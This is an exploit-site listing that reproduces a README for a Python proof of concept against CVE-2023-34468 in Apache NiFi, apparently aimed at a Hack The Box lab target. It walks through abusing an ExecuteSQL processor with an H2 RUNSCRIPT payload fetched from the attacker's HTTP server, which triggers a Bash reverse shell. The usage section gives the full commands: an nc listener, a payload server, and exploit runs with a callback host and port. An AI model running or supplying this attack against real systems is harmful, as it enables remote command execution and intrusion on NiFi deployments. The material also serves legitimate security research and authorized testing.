Share
## https://sploitus.com/exploit?id=14748680-800D-5A5B-8F0A-8FAAA6421030
# CVE-2023-34468 โ€” Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

Short Python PoC for abusing an editable Apache NiFi ExecuteSQL processor with an H2 `RUNSCRIPT` payload to trigger remote command execution through a Bash reverse shell.

> **For authorized testing and research only. Do not use against systems you do not own or have explicit permission to test.**

---

## What it does

```text
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
```

1. Discovers a single ExecuteSQL processor automatically, or accepts `--processor-id` manually.
2. Writes a local `rce.sql` payload that defines and calls a Java-backed shell execution alias.
3. Prompts you to start your own `nc` listener and HTTP server.
4. Updates the processor query to fetch `rce.sql` through H2 `RUNSCRIPT`.
5. Starts the processor to trigger the reverse shell.
6. Restores the original processor configuration after you confirm the shell landed.

---

## Screenshots

### 1. Setup

![Setup](images/1.png)

### 2. Request to payload

![Exploit run](images/2.png)

### 3. Shell received

![Processor update](images/3.png)

### 4. Result

![Result](images/4.png)

---

## Setup

```bash
git clone https://github.com/ozcanpng/CVE-2023-34468.git
cd CVE-2023-34468
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
```

---

## Usage

Terminal 1:

```bash
rlwrap nc -lvnp 4444
```

Terminal 2, from this repo directory:

```bash
python3 -m http.server 8000
```

Terminal 3:

```bash
python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
```

For manual processor selection:

```bash
python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id  --lhost 10.10.16.53 --lport 4444
```

---

## Affected

| Product | Affected Version | Access Required | Impact |
|---------|------------------|-----------------|--------|
| Apache NiFi | CVE-2023-34468 affected deployments using editable ExecuteSQL/H2 behavior | Ability to reach and modify the target NiFi processor through the API | Remote command execution |

---

## Notes

- The script assumes the NiFi API is reachable and the current user/session can modify the target processor.
- The generated `rce.sql` file is ignored by git and should be served from the repo directory with `python3 -m http.server`.
- If automatic discovery finds no processor or multiple candidates, pass the processor UUID manually with `--processor-id`.
- The script attempts to restore the original ExecuteSQL processor configuration after you confirm the shell landed.

---

## References

- [NVD โ€” CVE-2023-34468](https://nvd.nist.gov/vuln/detail/CVE-2023-34468)
- [Apache NiFi](https://nifi.apache.org/)
- [H2 Database Commands](https://www.h2database.com/html/commands.html)

---

## Author

ozcanpng โ€” [github.com/ozcanpng](https://github.com/ozcanpng) โ€” [ozcanpng.dev](https://ozcanpng.dev)